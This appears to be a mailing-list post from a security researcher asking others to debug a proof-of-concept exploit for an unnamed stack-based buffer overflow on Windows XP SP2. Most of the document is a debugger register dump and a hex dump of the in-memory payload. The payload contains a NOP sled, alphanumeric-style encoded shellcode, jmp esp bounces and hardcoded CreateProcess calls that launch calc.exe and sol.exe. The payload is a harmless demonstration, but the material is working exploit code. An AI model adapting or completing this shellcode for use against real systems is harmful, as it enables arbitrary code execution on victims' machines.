error in my code



I think that I need a beer. I will bet that there is
someone on this list that can pinpoint my error in 15
minutes. I will find some way to get them a
beer/wine/soft drink if so.

I have found and started to exploit a stack based
overflow but am stuck with a simple error in my POC.
It
is probably a coding error in my call to createproces
or a dumb shit coding error but I cannot yet find it.
I would appreciate someone taking a look at the
attached
POC and pointing out to me my error.

POC code and details are in the attached text file.

thanks



____________________________________________________________________________________
Boardwalk for $500? In 2007? Ha! Play Monopoly Here and Now (it's updated for today's economy) at Yahoo! Games.
http://get.games.yahoo.com/proddesc?gamekey=monopolyherenow

I have found a stack based overflow that can be exploited with some safe
addresses and two bounces off of a "jmp esp" piece of code. I am designing
a POC to run calc.exe and sol.exe.

The payload size is around 9K+, so I am not trying to conserve bytes and I
cannot use the full ASCII character set, it uses a custom variant of UTF-16.
I want to call createprocess twice, once for calc.exe and once for sol.exe
(solitaire). I then want to C3 return or I can call exitprocess. I setup
the stack for createprocess, create a call to createprocess, and then jmp
to the first call, jmp to second call and then return. Return is C3 or if
I need to change it I will call exitprocess.

I am missing something since the first call to create process ends up in
ntdll.dll module. (7c91d1d7) I think that I have somehow screwed up
the createprocess stack although I have triple checked it's setup.

The code runs fine unitl I call createprocess.

XP SP2+, DEP is off, no stack guard, the code is executing on the stack
with no problem.

I have delibrately crashed the code at EIP with: F1F1

(780.270): Single step exception - code 80000004 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0013c0dd ecx=0013c1d2 edx=0013c1aa esi=ffffffff edi=0013c0fb
eip=0013c348 esp=0013c1aa ebp=0013c45c iopl=0 nv up ei ng nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000296
0013c348 f1 ???

esp = 00131aaa the top of my createprocess stack
all registers, except esi/eax, point to areas in the stack.

call createprocess at 0013c370 and 0013c3d0 -each reached by jmp 20/eb 20
return at 0013c440
EIP is at 0013c348 where I used F1F1 to crash it

0013c0b0 20 20 20 20 77 3c 41 62 60 60 70 c3 13 00 90 90 w<Ab``p.....
0013c0c0 90 90 90 90 90 90 90 90 c4 c2 13 00 90 90 90 90 ................
0013c0d0 90 90 d2 c1 13 00 90 90 90 90 90 eb 39 63 3a 5c ............9c:\
0013c0e0 77 69 6e 64 6f 77 73 5c 73 79 73 74 65 6d 33 32 windows\system32
0013c0f0 5c 63 61 6c 63 2e 65 78 65 00 00 63 3a 5c 77 69 \calc.exe..c:\wi
0013c100 6e 64 6f 77 73 5c 73 79 73 74 65 6d 33 32 5c 73 ndows\system32\s
0013c110 6f 6c 2e 65 78 65 00 00 00 00 54 5e 83 c6 7e 83 ol.exe....T^..~.
0013c120 c6 7e 83 c6 7e 83 c6 7e 56 5d 44 44 44 44 44 44 .~..~..~V]DDDDDD
0013c130 44 44 44 44 54 5b 43 43 43 43 43 43 43 54 5e 83 DDDDT[CCCCCCCT^.
0013c140 c6 7e 83 c6 7e 56 5c 68 33 33 33 33 58 35 33 33 .~..~V\h3333X533
0013c150 33 33 54 59 44 44 44 44 44 44 44 44 44 44 44 44 33TYDDDDDDDDDDDD
0013c160 44 44 44 44 50 50 50 50 4c 4c 4c 4c 51 44 44 44 DDDDPPPPLLLLQDDD
0013c170 44 44 44 5a 4a 4a 4a 4c 4c 4c 4c 4c 4c 4c 4c 4c DDDZJJJLLLLLLLLL
0013c180 4c 50 50 52 50 50 50 50 53 5f 47 47 47 47 47 47 LPPRPPPPS_GGGGGG
0013c190 47 47 47 47 47 47 47 47 78 65 fb c0 13 00 00 00 GGGGGGGGxe......
0013c1a0 47 47 47 eb 70 90 90 90 90 90 dd c0 13 00 00 00 GGG.p...........
0013c1b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 ................
0013c1c0 00 00 00 00 00 00 00 00 00 00 d2 c1 13 00 d2 c1 ................
0013c1d0 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0013c1e0 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c1f0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c200 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c210 90 90 90 90 90 90 90 eb 20 90 90 90 90 90 90 90 ........ .......
0013c220 90 90 90 90 90 90 90 90 90 90 90 78 13 2a 00 00 ...........x.*..
0013c230 98 3b 78 65 90 90 90 90 90 90 47 47 47 47 47 4c .;xe......GGGGGL
0013c240 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 50 68 78 LLLLLLLLLLLLLPhx
0013c250 65 78 65 44 44 58 57 5c 50 44 44 44 44 44 44 44 exeDDXW\PDDDDDDD
0013c260 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0013c270 44 44 44 44 44 44 44 44 44 44 44 44 68 33 33 33 DDDDDDDDDDDDh333
0013c280 33 58 35 33 33 33 33 50 83 ec 58 57 5e 83 c6 78 3X53333P..XW^..x
0013c290 83 c6 37 8b d6 55 5e 83 c6 71 83 c6 36 46 46 46 ..7..U^..q..6FFF
0013c2a0 46 46 56 5d 8b e6 5e 46 46 90 90 90 90 90 90 90 FFV]..^FF.......
0013c2b0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c2c0 90 90 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 55 5e ..LLLLLLLLLLLLU^
0013c2d0 83 c6 60 56 5c 5e 46 46 90 4c 4c 4c 4c 4c 4c 4c ..`V\^FF.LLLLLLL
0013c2e0 4c 4c 4c 4c 4c 54 5e 83 c6 50 83 c6 44 56 5d 90 LLLLLT^..P..DV].
0013c2f0 90 54 5e 83 c6 7a 4e 4e 56 5c 5e 4e 4e 90 90 4e .T^..zNNV\^NN..N
0013c300 56 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 VDDDDDDDDDDDDDDD
0013c310 44 50 5e 4e 52 5c 90 90 90 90 90 90 90 90 90 90 DP^NR\..........
0013c320 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c330 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c340 90 90 90 90 90 90 90 f1 f1 90 eb 20 90 90 90 90 ........... ....
0013c350 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c360 90 90 90 90 d0 c3 13 00 90 90 90 90 90 90 90 90 ................
0013c370 e8 67 23 80 7c 90 90 90 90 90 90 90 90 90 90 90 .g#.|...........
0013c380 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c390 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c3a0 90 90 90 90 90 90 90 90 eb 20 90 90 90 90 90 90 ......... ......
0013c3b0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c3c0 90 90 90 90 40 c4 13 00 90 90 90 90 90 90 90 90 ....@...........
0013c3d0 e8 67 23 80 7c 90 90 90 90 90 90 90 90 90 90 90 .g#.|...........
0013c3e0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c3f0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c400 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c410 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c420 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c430 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c440 c3 90 90 90 90 90 90 90 90 90 90 90 aa c1 13 00 ................